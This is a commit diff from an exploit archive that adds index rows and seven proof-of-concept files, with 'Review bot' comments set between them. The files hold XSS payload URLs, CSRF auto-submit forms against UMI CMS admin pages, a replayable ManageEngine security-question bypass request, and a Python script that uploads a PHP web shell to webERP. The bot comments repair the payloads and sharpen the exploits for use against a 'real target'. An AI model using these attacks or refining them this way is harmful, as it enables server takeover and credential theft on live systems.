Updated 11_24_2014

Offensive Security 2014-11-24 04:47:19 +00:00
parent 4283820381
commit 430fa48249
8 changed files with 196 additions and 1 deletion

View file

@ -18183,7 +18183,7 @@ id,file,description,date,author,platform,type,port
20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification Vulnerability",2001-06-12,"SNS Advisory",windows,remote,0
20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments Blind SQL Injection Vulnerability",2012-08-29,Spy_w4r3,php,webapps,0
20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
20915,platforms/windows/local/20915.py,"ActFax 4.31 Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
20915,platforms/windows/local/20915.py,"ActFax 4.31 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0
20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0
20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability",2012-08-29,Ciph3r,windows,dos,0
20918,platforms/php/webapps/20918.txt,"Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0
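Review bot: the only change in this hunk is the description of id 20915 gaining the " - " separator between product/version and title, matching neighbouring rows such as `"Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability"`; path, author, date and platform are untouched, so nothing that keys on the file path breaks. The edit is not visible from the commit message ("Updated 11_24_2014"), which reads as pure appends; suggest naming the rewritten id in the log so a later audit of files.csv can tell a title normalisation from a new entry.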
@ -31817,3 +31817,10 @@ id,file,description,date,author,platform,type,port
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0
35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0
35330,platforms/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 POST Request Manipulation Security Question Weakness",2011-02-10,"Core Security",php,webapps,0
35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 EmployeeSearch.cc Multiple Parameter XSS",2011-02-10,"Core Security",php,webapps,0
35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0
35333,platforms/php/webapps/35333.py,"webERP 4.0.1 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability",2011-02-10,"AutoSec Tools",php,webapps,0
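Review bot: the seven new rows do not follow the " - " separator convention the hunk above just enforced on 20915, e.g. `"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities"` and `"Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities"`; suggest `"CiviCRM 3.3.3 - Multiple Cross Site Scripting Vulnerabilities"` and the same for 35328 through 35333 so product and title remain searchable separately. Row 35329 lists `PHPXref 0.7` as affected while the added 35329.txt states that versions prior to 0.7 are vulnerable; one of the two should change. Ids 35324 and 35326 are skipped between 35323 and 35327, which is fine if reserved but worth a word in the log. The 2011 dates are the SecurityFocus publication dates given in each file's `source:` line, not the date of this commit, which is consistent with how the other back-filled rows in the file are dated.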


28
platforms/php/webapps/35327.txt Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/46275/info
CiviCRM is prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
CiviCRM 3.3.3. is vulnerable; prior versions may also be affected.
Drupal:
http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/code.php?class=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/details.php?class=<script>alert(0)</script>
http://www.example.com/drupal-6.20/sites/all/modules/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E
Joomla:
http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?defaultPath=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/amfphp/browser/methodTable.php?class=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_dropin.php?lang=0%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/joomla/administrator/components/com_civicrm/civicrm/packages/PHPgettext/examples/pigs_fallback.php?lang=%3Cscript%3Ealert(0)%3C/script%3E
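Review bot: every PoC here hits a script inside a vendored third-party package (OpenFlashChart's `ofc_upload_image.php`, the amfphp `browser/` pages, the PHPgettext `examples/` scripts) rather than CiviCRM's own code, and the description should say so, because the remediation is to delete or deny access to those bundled example and browser files, not to patch CiviCRM request handling. Text nits that cannot be fixed in a diff view but should be in the file: `CiviCRM 3.3.3. is vulnerable` has a stray period, and `they fail to properly sanitize` should be `it fails`. The `details.php` URL is the only one whose payload is unencoded (`?class=<script>alert(0)</script>`) while the other eight use `%3Cscript%3E`; encode it the same way so all nine paste into a browser or a scanner identically.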

47
platforms/php/webapps/35328.txt Executable file
View file

@ -0,0 +1,47 @@
source: http://www.securityfocus.com/bid/46280/info
UMI CMS is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
UMI CMS 2.8.1.2 is vulnerable; other versions may also be affected.
<form action="http://host/admin/news/edit/PAGEID/do/" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="referer" value="hello">
<input type="hidden" name="domain" value="host">
<input type="hidden" name="name" value=&#039;news"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="alt-name" value="altname">
<input type="hidden" name="active" value="0">
<input type="hidden" name="active" value="1">
<input type="hidden" name="type-id" value="23">
<input type="hidden" name="save-mode" value="Save">
<input type="hidden" name="template-id" value="2">
<input type="hidden" name="is-visible" value="0">
<input type="hidden" name="is-default" value="0">
<input type="hidden" name="perms_read[2373]" value="1">
</form>
<script>
document.main.submit();
</script>
<form action="http://[host]/admin/content/edit/PAGEID/do/" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="referer" value="google">
<input type="hidden" name="domain" value="[host]">
<input type="hidden" name="name" value=&#039;price3"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="alt-name" value="price">
<input type="hidden" name="active" value="0">
<input type="hidden" name="active" value="1">
<input type="hidden" name="type-id" value="10">
<input type="hidden" name="save-mode" value="Save">
<input type="hidden" name="template-id" value="2">
<input type="hidden" name="is-visible" value="0">
<input type="hidden" name="is-visible" value="1">
<input type="hidden" name="is-default" value="0">
</form>
<script>
document.main.submit();
</script>
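Review bot: both injected values are broken as HTML. In `value=&#039;news"><script>alert(document.cookie)</script>&#039;>` the attribute value is unquoted (an `&#039;` entity is not a quote delimiter), so it ends at the `"`, the following `>` closes the `<input>`, the `<script>` runs in the attacker's own page, and the POSTed `name` field is just `'news"`. Use a literal single-quoted attribute in both forms: `value='news"><script>alert(document.cookie)</script>'` and `value='price3"><script>alert(document.cookie)</script>'`. Both forms also carry `name="main"`, so if they are kept in one file `document.main.submit()` is ambiguous; split them into two pages or rename one. The file should also state what it demonstrates: a CSRF auto-submit against `/admin/news/edit/PAGEID/do/` and `/admin/content/edit/PAGEID/do/` that plants the payload in the `name` field, so the victim must be a logged-in UMI CMS administrator, and `PAGEID`, `type-id`, `template-id` and `perms_read[2373]` are installation-specific values the attacker has to know in advance. The first form uses `http://host/` and the second `http://[host]/`; pick one placeholder.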

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46302/info
PHPXref is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials.
Versions prior to PHPXref 0.7 are vulnerable; other versions may also be affected.
http://www.example.com/nav.html?javascript:alert(document.cookie)
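Review bot: `Versions prior to PHPXref 0.7 are vulnerable` contradicts the files.csv row added in this same commit, which names 0.7 itself; one of the two should change. The PoC passes the payload as the bare query string to an `.html` page, which has no server-side handler, so this is DOM-based: it only fires if the script in `nav.html` reads `location.search` and assigns it to a URL sink. The file should name that sink so a reader can confirm the fix in the generated navigation page rather than looking for server-side escaping. Also `Exploiting these issues` is plural for a single issue.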

24
platforms/php/webapps/35330.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/46331/info
ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities.
Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected.
POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1
Host: SERVER
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.example.com/accounts/ValidateUser
Cookie: JSESSIONID=8F93EB242EF06C51BE93EB0CEDA69085
Content-Type: application/x-www-form-urlencoded
Content-Length: 294
loginId=1501&Hide_Captcha=0&POLICY_ID=1&Confirm_Answer=1&SESSION_EXPIRY_TIME=5&LOGIN_NAME=alice&REM_SESSION_TIME=00%3A40&bAns=11111&bQues=PreDefined-2&bAns=22222&bQues=PreDefined-3&bAns=33333&bQues=PreDefined-4&bAns=44444&bQues=PreDefined-5&quesList=4&DIGEST=qodpgd&next=Continue&DIS_ALL_QUES=1
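Review bot: the hunk gives the raw request but never says what the manipulation is or how to tell it worked. From the body, the request answers five predefined questions (`bQues=PreDefined-2` through `PreDefined-5`, each with a throwaway `bAns`) while sending `quesList=4` and `DIS_ALL_QUES=1`, which suggests the server trusts the client-supplied question list and count instead of the policy's own; the file should state which of these fields is attacker-controlled, what the server should have rejected, and what response marks a successful bypass. `Content-Length: 294` does match the body as shown, so the request can be replayed verbatim once `JSESSIONID`, `loginId=1501`, `LOGIN_NAME=alice` and `DIGEST=qodpgd` are replaced with values for the target session; say that those are placeholders.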

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46331/info
ManageEngine ADSelfService Plus is prone to multiple vulnerabilities, including multiple security-bypass and cross-site scripting vulnerabilities.
Attackers can exploit these issues to bypass certain security restrictions and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help them steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADSelfService Plus 4.4 is vulnerable; other versions may also be affected.
http://www.example.com/EmployeeSearch.cc?actionId=showList&searchString=alice%22%20onmouseover=%22alert%28%27xss%27%29&parameterName=name&searchType=containshttp://www.example.com/EmployeeSearch.cc?actionId=Search&parameterName=name&searchType=contains&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29
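Review bot: two PoC URLs are fused onto one line (`...&searchType=containshttp://www.example.com/EmployeeSearch.cc?actionId=Search...`); split them after `searchType=contains` so they can be copied. Both show the same pattern and the file should say so: `searchString` is reflected inside a double-quoted attribute, and `alice%22%20onmouseover=%22alert(%27xss%27)` closes the value and injects an event handler rather than a `<script>` tag, which matters because a fix that strips tags but leaves `"` unencoded does not stop it. The second URL's `javascript%3A` prefix inside the handler is redundant and can be dropped.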

10
platforms/php/webapps/35332.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/46337/info
Dolphin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Dolphin 7.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/dolphin/explanation.php?explain=%3Cscript%3Ealert(0)%3C/script%3E
http://www.example.com/dolphin/modules/boonex/custom_rss/post_mod_crss.php?relocate=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
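Review bot: the two PoCs sit in different output contexts and the description should name them: `explain=%3Cscript%3E...` is reflected straight into the page body, while `relocate=%22%3E%3Cscript%3E...` begins with `">`, i.e. the value lands inside a quoted attribute (consistent with a return URL echoed into a form or meta tag) and has to break out first. Stating the reflection point per parameter tells a reader which escaping fixes each one; the boilerplate `fails to properly sanitize user-supplied input` is all the reader gets otherwise.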

61
platforms/php/webapps/35333.py Executable file
View file

@ -0,0 +1,61 @@
source: http://www.securityfocus.com/bid/46341/info
webERP is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
webERP 4.0.1 is vulnerable; other versions may also be affected.
import socket
host = 'localhost'
path = '/weberp'
shell_path = path + '/shell.php'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/includes/InputSerialItemsFile.php?LineNo=/../../../shell.php%00 HTTP/1.1\r\n'
'Host: localhost\r\n'
'Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 264\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="LineNo"\r\n'
'\r\n'
'shell.php\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="ImportFile"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'------x--\r\n'
'\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
else: print 'shell located at http://' + host + shell_path
upload_shell()
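Review bot: the Python lost its indentation in this rendering (everything after `def upload_shell():` sits at column 0), so it does not parse as shown; the body must be re-indented before use, and the `print 'error uploading shell'` statements mark it as Python 2. Logic points in the file itself: the Host header is hard-coded as `'Host: localhost\r\n'` while the follow-up GET uses `host`, so pointing `host` at a real target sends the wrong virtual host on the upload; `s.send()` should be `s.sendall()`, since a short send silently truncates the multipart body (`Content-Length: 264` is correct for the body as written); and the success test only checks for `HTTP/1.1 200 OK`, which the upload page will likely return even when the write fails, so the second GET is the real check. The dropped file `<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>` uses `+` where PHP string concatenation is `.`; `system()` writes its output directly so the shell still works, but the `echo` emits a warning and `0` instead of the `<pre>` tags. Finally, `LineNo=/../../../shell.php%00` relies on null-byte truncation of the destination path to discard whatever suffix the application appends; PHP rejects paths containing NUL from 5.3.4 onward, so that should be stated as a precondition alongside the webERP version.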